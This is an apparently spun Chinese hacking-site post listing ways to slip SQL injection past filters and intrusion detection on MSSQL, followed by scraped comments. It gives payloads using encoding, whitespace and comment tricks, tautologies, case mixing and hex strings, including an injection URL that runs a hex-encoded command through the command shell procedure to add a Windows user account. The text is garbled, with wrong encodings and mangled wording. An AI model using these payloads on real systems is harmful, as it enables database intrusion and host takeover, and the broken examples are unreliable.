分享几种绕过注入的方法

分享几种绕过注入的方法

入侵渗透hacker2019-06-05 11:27:4915755A+A-

1、应用编号技术性绕开

如URLEncode编号,ASCII编号绕开。比如or 1=1即

%6f%76%30%28%3d%28,而Test还可以为CHAR(117)+CHAR(83)+CHAR(113)+CHAR(116)。

2、根据空格符绕开

如2个空格符替代1个空格符,用Tab替代空格符等,或是删掉全部空格符,如

or’ swords’ =‘swords’

,因为mssql的疏松性,人们能够把or ‘swords’ 中间的空格符除掉,并不是危害运作。

3、应用字符串分辨替代

用經典的or 1=1分辨绕开,如

or ‘swords’ =’swords’

,这一方式就是说在网上在探讨的。

4、根据类型转换修饰符N绕开

能够说它是1个非常好的念头,他除开能在某种意义上绕开限定,并且也有其他功效,大伙儿自个好好地想着吧。有关运用,如or ‘swords’ = N’ swords’ ,英文大写的N告诉他mssql server 字符串做为nvarchar种类,它具有类型转换的功效,并不是危害打针句子自身,可是能够避开应用场景专业知识的模式匹配IDS。

5、根据+号拆卸字符串绕开

实际效果最该资格证书,但终究是这种方式。如

or ‘swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ‘+’ …._’ )

6、根据LIKE绕开

之前如何就想不到呢?如or

‘swords’ LIKE ‘sw’

!!!显而易见能够很轻轻松松的绕开

“=”“>”

的限定……

7、根据IN绕开

与上边的LIKE的构思类似,如

or ‘swords’ IN (‘swords’)

8、根据BETWEEN绕开

or ‘swords’ BETWEEN ‘rw’ AND ‘tw’

9、根据>或是<绕开

or ‘swords’ > ‘sw’

or ‘swords’ < ‘tw’

or 1<3

……

12、应用注解句子绕开

用替代空格符,如:

UNION Select user,pwd,from tbluser

用切分敏感词汇,如:

U NION SE LECT user,pwd from tbluser

12、用HEX绕开,通常的IDS都没法检验出去

0x730079007300610064006D0069006E00 =hex(sysadmin)

0x640062005F006F0077006E0065007200 =hex(db_owner)

另一个,有关通用性点的过虑方式,人们能够考虑到选用赋值的方式,比如先申明1个自变量a,随后把人们的命令赋值给a,随后启用自变量a最后实行人们键入的指令。自变量a能够是一切指令。给出:

  declare @a sysname

  select @a=

  exec master.dbo.w7_cmdshell @a

实际效果

.com://WWW.sexxx.Com/girl.asp?Id=1;declare%30@a% 30sysname%30select%30@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%30exec%30master.dbo.w7_cmdshell%30@a;–

至少的

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400

就是说

“net user angel pass /Add”

的含意。

 分享几种绕过注入的方法 第1张

13、英文大小写交换绕开

select 能够写出 SelEct

union 能够写出 UnIoN

 

12、多种多样编号组成绕开

常见的有BASE64、ASC、SQL、HEX、URL编号

 

13、运用转站专用工具绕开

能够运用刺猬的转站专用工具来绕开 

 

16、运用特殊字符添充绕开

这种特殊字符,会被表述成空格符,方法和根据空格符绕开相同的,通常用于绕开第三方平台防火墙软件

 

18、更改攻击方式

要是set递交确实没法绕开,能够试着更改攻击方式。如;post引入、找寻子站、旁站……等。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 山有枢2022-06-03 16:05:56
  • 730079007300610064006D0069006E00 =hex(sysadmin)0x640062005F006F0077006E0065007200 =hex(
  • 假欢路岷2022-06-03 12:23:00
  • NION SE LECT user,pwd from tbluser12、用HEX绕开,通常的IDS都没法检验出去0x730
  • 孤央鹿鸢2022-06-03 16:15:57
  • 的方式,比如先申明1个自变量a,随后把人们的命令赋值给a,随后启用自变量a最后实行人们键入的指令。自变量a能够是一切指令。给出:  declare @a sysname  select @a=  exec maste
  • 离鸢七禾2022-06-03 13:49:04
  • 6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%30
  • 余安闻呓2022-06-03 15:36:46
  • > ‘sw’or ‘swords’ < ‘tw’or 1<3……12、应用注解句子绕开用替代空格符,如:UNION Select

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理